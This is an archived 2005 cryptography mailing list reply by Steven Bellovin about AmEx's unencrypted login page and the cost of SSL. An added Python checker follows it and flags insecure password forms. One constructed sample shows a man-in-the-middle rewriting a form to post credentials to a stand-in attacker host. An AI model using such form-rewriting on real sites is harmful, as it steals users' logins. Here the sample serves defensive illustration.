[17412] in cryptography@c2.net mail archive


Re: AmEx unprotected login site

daemon@ATHENA.MIT.EDU (Steven M. Bellovin)
Wed Jun 8 21:26:17 2005

X-Original-To: cryptography@metzdowd.com
From: "Steven M. Bellovin" <smb@cs.columbia.edu>
To: "Perry E. Metzger" <perry@piermont.com>
Cc: Jerrold Leichter <jerrold.leichter@smarts.com>,
	Amir Herzberg <herzbea@macs.biu.ac.il>, cryptography@metzdowd.com
In-Reply-To: Your message of "Wed, 08 Jun 2005 15:16:29 EDT."
             <87acm0hd6a.fsf@snark.piermont.com> 
Date: Wed, 08 Jun 2005 18:07:17 -0400

In message <87acm0hd6a.fsf@snark.piermont.com>, "Perry E. Metzger" writes:
>
>Jerrold Leichter <jerrold.leichter@smarts.com> writes:
>> If you look at their site now, they *claim* to have fixed it:  The login box
>> has a little lock symbol on it.  Click on that, and you get a pop-up window
>> discussing the security of the page.  It says that although the page itself
>> isn't protected, "your information is transmitted via a secure environment".
>>
>> No clue as to what exactly they are doing, hence if it really is secure.
>
>They're still doing the wrong thing. Unless the page was transmitted
>to you securely, you have no way to trust that your username and
>password are going to them and not to someone who cleverly sent you an
>altered version of the page.
>

They're doing the wrong thing, and probably feel they have no choice.  
Setting up an SSL session is expensive; most people who go to their 
home page do not log in, and hence do not (to Amex) require 
cryptographic protection.

A few years ago, I talked with someone who was setting up a system that 
really needed security.  Given how few pages people would visit on the 
site, though, he estimated that it would increase his costs by a factor 
of about 15.  (I didn't verify the numbers; I know from experience that
he's competent and has his heart in the right place re security.)

		--Steven M. Bellovin, http://www.cs.columbia.edu/~smb
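The point Perry makes in the quoted text, that a login page served over plain HTTP cannot vouch for where its form posts, no matter what a lock icon or pop-up says, is the kind of thing one can check mechanically. The following Python is an added example and is not part of the original message or of anything AmEx published; the hostnames example-card.com and example-attacker.net and the three HTML pages are constructed for illustration. The check parses the page for forms containing a password field and flags three conditions: the page itself arrived over HTTP (so the form target is unverifiable), the form action is not HTTPS, and the form action points at a different host.

```python
"""Check whether a login form is actually protected.

Added example, not from the original thread.  The sample pages below are
constructed, not captured from any real site.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormFinder(HTMLParser):
    """Collects every <form> that contains an <input type="password">."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of (action, has_password)
        self._current = None   # [action, has_password] of the open form

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def assess_login_page(page_url, html):
    """Return a list of problems with the login form(s) found in html.

    An empty list means the page was served over HTTPS and every password
    form posts over HTTPS to the same host as the page."""
    page = urlsplit(page_url)
    finder = LoginFormFinder()
    finder.feed(html)
    problems = []
    if page.scheme != "https":
        # Perry's point: an HTTP page can be rewritten in transit, so nothing
        # it says about where the credentials go can be trusted.
        problems.append("page served over %s: form target is unverifiable"
                        % page.scheme)
    login_forms = [(action, pw) for action, pw in finder.forms if pw]
    if not login_forms:
        problems.append("no password form found")
    for action, _ in login_forms:
        # Resolve relative actions against the page URL, as a browser would.
        target = urlsplit(urljoin(page_url, action))
        if target.scheme != "https":
            problems.append("form posts over %s to %s"
                            % (target.scheme, target.netloc))
        if target.hostname != page.hostname:
            problems.append("form posts to a different host: %s"
                            % target.netloc)
    return problems


# Constructed sample: an HTTP home page whose login form posts to HTTPS,
# the arrangement discussed in the thread.
HOME_HTTP = "http://www.example-card.com/"
PAGE_AS_SERVED = """<html><body>
<form method="post" action="https://www.example-card.com/login">
  <input name="user"><input type="password" name="pass">
</form></body></html>"""

# Constructed sample: the same page after a man-in-the-middle rewrote the
# form action.  Nothing else on the page needs to change.
PAGE_AS_ALTERED = PAGE_AS_SERVED.replace(
    "https://www.example-card.com/login",
    "http://login.example-attacker.net/collect")

# Constructed sample: the fix, the whole login page served over HTTPS.
HOME_HTTPS = "https://www.example-card.com/login"
PAGE_FIXED = PAGE_AS_SERVED


if __name__ == "__main__":
    for label, url, html in (("as served", HOME_HTTP, PAGE_AS_SERVED),
                             ("altered in transit", HOME_HTTP, PAGE_AS_ALTERED),
                             ("page over HTTPS", HOME_HTTPS, PAGE_FIXED)):
        print(label + ":", assess_login_page(url, html) or "ok")
```

Note that the first two cases are indistinguishable to the user who fetched the page over HTTP: the only difference is the rewritten action attribute, which the lock icon does not cover. The check treats the HTTP-served page as a problem on its own, before looking at the action, which is the conclusion of the quoted text.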



---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
